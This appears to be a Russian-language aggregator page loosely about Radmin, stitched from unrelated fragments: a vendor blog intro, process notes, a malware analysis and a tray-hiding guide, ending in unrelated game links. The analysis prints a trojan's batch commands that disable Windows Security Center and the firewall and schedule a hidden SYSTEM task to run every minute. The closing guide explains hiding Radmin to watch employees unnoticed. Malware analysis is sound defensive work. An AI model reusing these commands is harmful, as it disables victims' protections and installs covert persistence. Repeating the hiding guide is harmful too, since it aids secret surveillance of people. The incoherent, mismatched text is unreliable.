Как удалить radmin mirror driver v3

Обновлено: 28.06.2024

Каждый из вас, должно быть, знает, что такое программы удаленного доступа и зачем они нужны. Этот блог посвящен одной из таких программ, которая, думаю, в особом представлении не нуждается. Появившись 11 лет назад, Radmin стал очень популярен как в России, так и далеко за ее пределами. Он говорит на 27 языках всему миру о том, что удаленное управление компьютерами может быть безопасным, быстрым и простым как нажатие клавиши.

Этот блог призван поделиться практическими советами, гайдами, тонкостями и хитростями применения программ для удаленного управления компьютерами в любой ситуации. Мы постараемся рассказать, как эффективно решать разнообразные задачи, связанные с системным администрированием, оказанием техподдержки, а также развертыванием комплексного ПО в распределенных сетях различных размеров. Также мы будем говорить как о базовых механизмах настройки и работы по Radmin, так и o новых, необычных решениях, проводить тестирования версий, дарить подарки, ну и конечно, рассказывать, что интересного у нас происходит! В кулуарах хабра мы расскажем о Radmin чуть больше, чем на официальном сайте и сможем взаимно обмениваться опытом. Тем более, что некоторые из авторов нашего блога – хорошо знакомые вам хабравчане, профессиональные программисты, стоявшие у истоков создания этой замечательной программы.

Знаете ли вы, что Radmin родился в России более 11 лет назад? Автор первой версии, талантливый программист Дмитрий Зноско на тот момент заканчивал МГУ, и для написания диплома ему потребовалась программа, которая позволила бы подключаться к удаленному серверу. Потребовалось полгода кропотливой работы, прежде чем задача была решена. Так появился Radmin, который быстро разлетелся по друзьям и знакомым, покорил сперва Америку, а потом и Россию, до которой информационно-технический прогресс докатился чуть позже. С тех пор Дмитрий является владельцем компании «Фаматек», флагманским продуктом которой является Radmin.

Безопасность важнее всего…

«У Radmin «параноидальная» система безопасности, и ломать его – себе дороже», — сказал один американский хакер. Однажды мы провели конкурс среди программистов и хакеров по всему миру: предложили вознаграждение тому, кто сможет получить доступ к Radmin, установленному на публичном сервере в Internet. После многочисленных попыток, никому так и не удалось взломать систему аутентификации Radmin. Были даже попытки взломать хостера, которые также не увенчались успехом. За все время существования программы не было найдено уязвимостей в Radmin и нет эксплойтов, которые могли бы их использовать. Не многие программы удаленного доступа могут этим похвастаться.

Мы приветствуем вопросы, а также предложения тем для наших постов и дискуссий. Предлагайте их в комментариях, и мы незамедлительно их раскроем.

Процесс от ПО Radmin, которое предназначено для удаленного управления ПК.

Также вы можете заметить еще процессы FamItrf2.exe, rserver3.exe, это все тоже от Radmin.

WIN2K это означает Windows 2000, это операционка, которая была до Windows XP. Другими словами возможно что программа Radmin существовала еще во времена Windows 2000.

Также процесс FamItrfc может запускаться и из этой папки:

Поэтому часто антивирусы в процессах Radmin видят угрозу. Сама программа неопасная, но на основе ее может быть создан вирус, поэтому такая реакция у антивирусов.

Если вы лично установили ПО Radmin, тогда вам нужно добавить папку программы в исключения антивируса.

Если вы не устанавливали Radmin, тогда возможно у вас на ПК вирус.

А вот клиентская часть под названием Radmin Viewer, при помощи которой можно подключаться к ПК (на котором в свою очередь стоит серверная часть):

Здесь могут быть все ПК, на которых стоит серверная часть и которым можно подключиться. Конечно не все так просто, для подключения нужен вроде IP адрес и пароль, именно эту информацию и может хакеру отправлять вирус, созданный на основе Radmin.

Анализ очередного варианта скрытого радмина

Оба упакованы в upx, после распаковки получим следующую картину:

filip_olegovich.exe — собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) — компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованного setup.exe:

Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:

sc config schedule start= auto
sc start schedule

sc config wscsvc start= disabled
sc config SharedAccess start= disabled

sc stop wscsvc
sc stop SharedAccess

schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat

attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe

Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл. Разработчик или параноик или диллетант, скорее — второе. Проще говоря, этот файл setup.exe — экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровизированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin

%systemroot% — папка windows, в моем случае C:\windows

Этот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32

После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии: raddrv.dll и AdmDll.dll — драйвера Radmin 2

svchost.exe — исполняемый файл Radmin 2

Blat.* — файлы, пренадлежащие консольному почтовому клиенту blat

А вот эти файлы рассмотрим поподробней: install.bat

sc config wscsvc start= disabled
sc stop wscsvc

sc config SharedAccess start= disabled
sc stop SharedAccess

Разберем команды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее — самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина — Service Host Controller

Ну и окончание — запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat

На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.

Как спрятать radmin

Программа Radmin является условно бесплатным приложением, которое позволяет выполнять удаленное администрирование персонального компьютера в локальной сети. Как правило, данное программное обеспечение используется в крупных компаниях для отслеживания работы сотрудников, поэтому в некоторых случая требуется спрятать Radmin из трея.

Запустите файл rserv34ru.exe на компьютере, который необходимо подключить для удаленной работы. Появится диалоговое окно с инструкцией по установке. Все файлы программы будут помещены в системную директорию, а в трее отобразится соответствующая иконка. Нажмите на нее правой кнопкой мышки и выберите пункт «Настройка Radmin Server». Перейдите на вкладку «Права доступа».

Выберите режим безопасности и добавьте в него текущего пользователя. Введите его имя и пароль доступа к компьютеру. После этого зайдите в основное меню настроек. Укажите порт для подключения и активируйте функцию «Запрашивать подтверждение у пользователя». Вверху слева будет кнопка «Иконка в трее». Нажмите на нее и выберите в выпадающем меню «Не показывать в трее». Таким образом, программа будет скрыта от пользователя, и вы сможете беспрепятственно наблюдать за его работой.

Установите приложение Radmin Viewer 3.4, которое необходимо для подключения к удаленному компьютеру. После завершения процесса установки запустите программу и создайте новое подключение, в котором укажите данные компьютера, на котором установлен Radmin Server 3.4.

После этого нажмите на новом подключении правой кнопкой мышки и выберите пункт «Управление». Введите логин и пароль. Если после этого вы подключитесь к рабочему столу удаленного компьютера, то настройка программы выполненная верно. При этом удаленный пользователь не будет видеть в трее вашу активность.

Читайте также:

  
• Как стать годзиллой в гта 5
  
• Как играть в одной команде в battlefield 3
  
• Как создать сайт майнкрафт
  
• Borderlands 2 как играть вдвоем на одной консоли
  
• Sniper ghost warrior 3 как захватить аванпост